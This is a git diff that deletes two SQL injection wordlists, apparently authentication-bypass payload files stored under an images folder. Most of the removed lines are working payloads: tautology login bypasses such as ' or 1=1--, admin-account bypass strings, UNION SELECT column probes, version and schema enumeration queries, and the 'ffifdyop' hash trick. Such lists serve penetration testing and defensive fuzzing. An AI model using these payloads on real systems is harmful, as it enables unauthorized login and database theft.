-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
